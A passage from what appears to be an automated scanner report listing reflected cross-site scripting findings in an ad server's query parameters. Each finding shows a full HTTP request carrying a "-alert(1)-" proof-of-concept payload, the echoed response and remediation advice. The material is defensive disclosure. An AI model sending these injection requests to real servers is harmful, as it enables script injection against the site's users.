The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3334"-alert(1)-"8bb98f76d2b was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3c3334"-alert(1)-"8bb98f76d2b&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:06:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
1241976%3B2-0%3B0%3B55844876%3B4307-300/250%3B38010001/38027758/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3c3334"-alert(1)-"8bb98f76d2b&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqd
...[SNIP]...

1.26. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4eed4"-alert(1)-"ce7690ba46a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=80244eed4"-alert(1)-"ce7690ba46a&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:04:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...

var url = escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5a/17/181/%2a/z%3B231241976%3B1-0%3B0%3B55844876%3B4307-300/250%3B38009999/38027756/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=80244eed4"-alert(1)-"ce7690ba46a&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppa
...[SNIP]...

1.27. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38d85"-alert(1)-"ea05c790aae was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.2038d85"-alert(1)-"ea05c790aae&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:13:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6914

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.2038d85"-alert(1)-"ea05c790aae&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
...[SNIP]...

1.28. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [b parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 350a3"-alert(1)-"017b84a1884 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5350a3"-alert(1)-"017b84a1884&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:05:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
click%3Bh%3Dv8/3a5a/17/16c/%2a/j%3B231242665%3B1-0%3B0%3B55844900%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5350a3"-alert(1)-"017b84a1884&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0
...[SNIP]...

1.29. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8abfc"-alert(1)-"81641716a0d was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=200122538abfc"-alert(1)-"81641716a0d&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:09:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
%3B0%3B55844900%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=200122538abfc"-alert(1)-"81641716a0d&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event
...[SNIP]...

1.30. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [count parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ce02"-alert(1)-"2612c838241 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=9ce02"-alert(1)-"2612c838241&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:12:14 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=9ce02"-alert(1)-"2612c838241&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa");
var fsc
...[SNIP]...

1.31. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [cpnmodule parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49e73"-alert(1)-"58a8d0f3679 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=49e73"-alert(1)-"58a8d0f3679&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:11:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=49e73"-alert(1)-"58a8d0f3679&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa");

...[SNIP]...

1.32. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [e parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13e74"-alert(1)-"23471b4e672 was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=313e74"-alert(1)-"23471b4e672&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:09:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
4900%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=313e74"-alert(1)-"23471b4e672&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://
...[SNIP]...

1.33. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [epartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79d10"-alert(1)-"bac537ef45c was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=79d10"-alert(1)-"bac537ef45c&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:11:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
og.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=79d10"-alert(1)-"bac537ef45c&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na
...[SNIP]...

1.34. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [event parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload deb80"-alert(1)-"57c164cc6fa was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=deb80"-alert(1)-"57c164cc6fa HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6808
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 22 Nov 2010 00:13:24 GMT
Expires: Mon, 22 Nov 2010 00:13:24 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=deb80"-alert(1)-"57c164cc6fahttp://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg =
...[SNIP]...

1.35. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a34fd"-alert(1)-"bc95ae28570 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cna34fd"-alert(1)-"bc95ae28570&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
